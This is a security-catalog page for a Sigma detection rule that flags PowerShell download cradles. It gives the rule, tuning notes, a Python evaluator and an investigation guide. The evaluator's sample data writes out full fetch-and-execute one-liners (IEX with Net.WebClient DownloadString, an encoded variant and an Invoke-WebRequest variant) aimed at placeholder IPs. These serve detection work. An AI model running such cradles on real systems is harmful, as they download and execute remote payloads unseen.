Suspicious PowerShell Download Cradle

Detection Details
Comprehensive information about this detection rule

Description

This detection identifies PowerShell command lines that contain a download cradle pattern. A download cradle fetches code from a remote server and hands it straight to the interpreter, so the payload runs in memory and is never written to disk where file-based controls would see it. Attackers use these one-liners to retrieve a stager or second-stage payload from infrastructure they control. Download cradles can be built from Net.WebClient, Invoke-WebRequest and other download methods combined with an execution primitive such as Invoke-Expression (IEX); the selection in this rule matches the Net.WebClient/DownloadString form.

Detection Details

Tool: Sigma
Category: Sigma
Severity: High
Status: Active

Metadata

ID: SIGMA-002
Author: Nasser Al Riyami
Last Updated: 2023-11-12

MITRE ATT&CK Techniques

T1059.001 - Command and Scripting Interpreter: PowerShell (Execution)
T1105 - Ingress Tool Transfer (Command and Control)

False Positives

  • Legitimate administrative scripts that download and execute code
  • Software deployment and update processes
  • Security tools and scanners
Detection Rule
View and export the detection rule

Tool-Specific Rule Format

title: Suspicious PowerShell Download Cradle
id: SIGMA-002
# Sigma only accepts stable/test/experimental/deprecated/unsupported here;
# "active" is the catalog status shown above, not a Sigma value.
status: test
description: Detects PowerShell command lines that use the Net.WebClient DownloadString download cradle, commonly used to fetch and execute code in memory without writing it to disk.
author: Nasser Al Riyami
date: 2023-11-12
modified: 2023-11-12
tags:
    - attack.execution
    - attack.t1059.001
    - attack.command_and_control
    - attack.t1105
logsource:
    # CommandLine is a process-creation field (Security 4688 / Sysmon Event ID 1).
    # The PowerShell service logs (4103/4104) expose ScriptBlockText instead, so
    # "service: powershell" would never yield a CommandLine match.
    category: process_creation
    product: windows
detection:
    selection:
        # Sigma string matching is case-insensitive; this will not see pwsh.exe,
        # -EncodedCommand payloads or the Invoke-WebRequest/DownloadFile variants.
        CommandLine|contains|all:
            - 'powershell'
            - 'Net.WebClient'
            - 'DownloadString'
    condition: selection
falsepositives:
    - Legitimate administrative scripts that download and execute code
    - Software deployment and update processes
    - Security tools and scanners
level: high

Implementation Notes

This Sigma rule can be converted for SIEM and EDR query languages with pySigma/sigma-cli (sigma convert) or the legacy sigmac tool; make sure the chosen processing pipeline maps the process_creation log source to the fields your telemetry actually carries. The rule is a clear-text substring match, so it has known blind spots: a cradle passed through -EncodedCommand (base64 of UTF-16LE), built by string concatenation, run under pwsh.exe, or written with Invoke-WebRequest, DownloadData or DownloadFile instead of DownloadString will not match. Pair it with PowerShell script block logging (Event ID 4104, ScriptBlockText), which records the de-obfuscated script as it executes. To reduce false positives, add filters keyed on parent process, signer or path for known deployment and update tooling rather than dropping the Net.WebClient term.
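As an added example (not code from this page or from the rule's author), the following Python evaluator applies the rule's CommandLine|contains|all selection to a handful of constructed process-creation command lines, then shows the normalization a detection pipeline needs in order to close the -EncodedCommand blind spot: it decodes the base64/UTF-16LE payload, re-runs the selection over the decoded body and pulls out the download URL for triage. The sample command lines, script and hosts (RFC 5737 documentation addresses) are all constructed for this example.

```python
import base64
import re

# The three strings from the rule's CommandLine|contains|all selection on this page.
# Sigma string matching is case-insensitive unless the |cased modifier is used,
# so the evaluator lower-cases both sides.
SELECTION = ("powershell", "Net.WebClient", "DownloadString")

# Every spelling of -EncodedCommand that powershell.exe accepts: any prefix of the
# full name (-e, -en, -enc, ...) plus the separate -ec alias.
_ENC_FLAGS = {"encodedcommand"[:i] for i in range(1, len("encodedcommand") + 1)} | {"ec"}

_URL_RE = re.compile(r"""https?://[^\s'"()]+""")


def encode_command(script: str) -> str:
    """Build a -EncodedCommand payload the way PowerShell expects it: UTF-16LE, then base64."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def selection_matches(command_line: str, needles=SELECTION) -> bool:
    """Evaluate the rule's selection: every needle must appear (case-insensitively) in the line."""
    haystack = command_line.lower()
    return all(needle.lower() in haystack for needle in needles)


def decode_encoded_command(command_line: str):
    """Return the script hidden behind -EncodedCommand (or any accepted prefix), else None.

    The command line is split on whitespace; the base64 blob never contains
    whitespace, so a plain split is sufficient for locating it.
    """
    tokens = command_line.split()
    for i, token in enumerate(tokens[:-1]):
        if token[:1] in "-/" and token[1:].lower() in _ENC_FLAGS:
            try:
                return base64.b64decode(tokens[i + 1], validate=True).decode("utf-16-le")
            except (ValueError, UnicodeDecodeError):
                return None
    return None


def extract_urls(text: str):
    """Pull http(s) URLs out of a command line or decoded script for triage."""
    return _URL_RE.findall(text)


def evaluate(command_line: str) -> dict:
    """Run the selection on the raw line and on the line normalized with its decoded body."""
    decoded = decode_encoded_command(command_line)
    normalized = command_line if decoded is None else command_line + " " + decoded
    return {
        "raw_match": selection_matches(command_line),
        "normalized_match": selection_matches(normalized),
        "urls": extract_urls(normalized),
    }


# Constructed sample process-creation command lines (not real telemetry); the
# hosts use RFC 5737 documentation ranges.
CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/stage.ps1')"
SAMPLE_EVENTS = {
    # Clear-text cradle: the rule as written catches this.
    "plain_cradle": 'powershell.exe -NoP -W Hidden -c "' + CRADLE + '"',
    # Same cradle behind -EncodedCommand: invisible to a CommandLine substring match.
    "encoded_cradle": "powershell.exe -NoP -enc " + encode_command(CRADLE),
    # Benign administrative use: must not match.
    "benign": "powershell.exe -NoProfile -Command Get-Date",
    # Invoke-WebRequest cradle named in the description but outside this rule's selection.
    "iwr_cradle": 'powershell.exe -c "IEX (Invoke-WebRequest -UseBasicParsing '
                  'http://203.0.113.9/a.ps1).Content"',
}

if __name__ == "__main__":
    for name, line in SAMPLE_EVENTS.items():
        result = evaluate(line)
        print(f"{name:15} raw={result['raw_match']!s:5} "
              f"normalized={result['normalized_match']!s:5} urls={result['urls']}")
```

Running the script shows the two outcomes that matter for tuning: the encoded cradle fails the raw match but passes once the payload is decoded, and the Invoke-WebRequest variant fails both, which is exactly the gap the description's "other download methods" wording papers over.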

Alert Details

Investigation Guide
Step-by-step guide for investigating alerts

Why This Alert Fired

This Sigma rule fired because a process-creation event recorded a PowerShell command line containing both Net.WebClient and DownloadString, the download cradle pattern commonly used to fetch code from a remote server and execute it in memory without writing it to disk.

Investigation Steps

  1. Identify which log source triggered the rule (Security 4688 or Sysmon Event ID 1 process creation) and collect the full CommandLine, ParentImage/ParentCommandLine, user and host
  2. Review the raw command line that matched the detection criteria
    • Decode any -EncodedCommand/-enc payload (base64 of UTF-16LE) and resolve string concatenation before judging the intent
    • Extract the URL or host passed to DownloadString and note whether the result is piped to IEX/Invoke-Expression
    • Check if the activity is consistent with the user's role and typical activities
  3. Examine the context surrounding the matched event: parent process (Office, browser or script host versus an administrative console or deployment agent), logon type and time of day
  4. Check for related events: PowerShell script block logs (Event ID 4104) for the downloaded content, proxy and DNS logs for the contact to the remote host, and follow-on process creation or network connections from the same PowerShell process
  5. Verify whether the activity maps to a known deployment or administrative job before closing the alert as a false positive

True Positive Indicators

  • Command line pairs the cradle with evasion flags such as -NoProfile, -WindowStyle Hidden, -ExecutionPolicy Bypass or -EncodedCommand, and feeds the download to IEX/Invoke-Expression
  • Unusual execution context: parent process is an Office application, browser, mshta/wscript or other user-facing program rather than an administrative console or deployment agent
  • Activity from unexpected users or systems, or a remote host that is a raw IP address, paste site or newly registered domain no known tooling uses
  • Correlation with other suspicious events on the host, such as new scheduled tasks or services, outbound beaconing or credential access following the download

False Positive Indicators

  • Legitimate administrative scripts that download and execute code
  • Software deployment and update processes
  • Security tools and scanners

Recommended Response Actions

This is a high-severity detection and requires immediate attention.

  1. Isolate affected systems from the network, keeping them powered on so volatile evidence survives
  2. Capture forensic evidence before any remediation: a memory image (the payload executed in memory and may exist nowhere else), PowerShell operational logs and the full command line
  3. Retrieve the remote payload from the identified URL in a sandbox to scope what was executed
  4. Reset credentials for any accounts that ran the cradle or were logged on to the affected host
  5. Block any identified malicious IPs/domains at the firewall and web proxy, and hunt for the same URL or command line across the rest of the fleet
  6. Initiate incident response procedures

Documentation & Evidence Collection

  • Document all investigation steps and findings in the case management system
  • Capture screenshots of relevant events and timelines
  • Export raw logs and preserve them as evidence
  • Document any systems accessed and actions taken during investigation
  • Record all remediation actions if a true positive is confirmed